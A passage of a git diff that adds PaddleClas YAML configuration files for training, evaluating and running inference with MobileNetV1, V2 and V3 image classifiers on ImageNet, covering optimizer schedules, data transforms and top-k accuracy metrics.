num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV1/MobileNetV1_x0_25.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV1/MobileNetV1_x0_25.yaml new file mode 100644 index 0000000..9fc0dd9 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV1/MobileNetV1_x0_25.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV1_x0_25 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV1/MobileNetV1_x0_5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV1/MobileNetV1_x0_5.yaml new file mode 100644 index 0000000..ef70964 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV1/MobileNetV1_x0_5.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV1_x0_5 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV1/MobileNetV1_x0_75.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV1/MobileNetV1_x0_75.yaml new file mode 100644 index 0000000..b9be283 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV1/MobileNetV1_x0_75.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV1_x0_75 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2.yaml new file mode 100644 index 0000000..fc0e61b --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: MobileNetV2 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.045 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x0_25.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x0_25.yaml new file mode 100644 index 0000000..0ebe458 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x0_25.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV2_x0_25 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.045 + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x0_5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x0_5.yaml new file mode 100644 index 0000000..c202390 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x0_5.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV2_x0_5 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.045 + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x0_75.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x0_75.yaml new file mode 100644 index 0000000..e581d72 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x0_75.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV2_x0_75 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.045 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x1_5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x1_5.yaml new file mode 100644 index 0000000..2ac0d69 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x1_5.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV2_x1_5 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.045 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x2_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x2_0.yaml new file mode 100644 index 0000000..ca4bf66 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV2/MobileNetV2_x2_0.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 240 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV2_x2_0 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.045 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x0_35.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x0_35.yaml new file mode 100644 index 0000000..54ffaff --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x0_35.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV3_large_x0_35 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 1.3 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00002 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x0_5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x0_5.yaml new file mode 100644 index 0000000..61626e8 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_large_x0_5.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV3_large_x0_5 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 1.3 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00002 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt 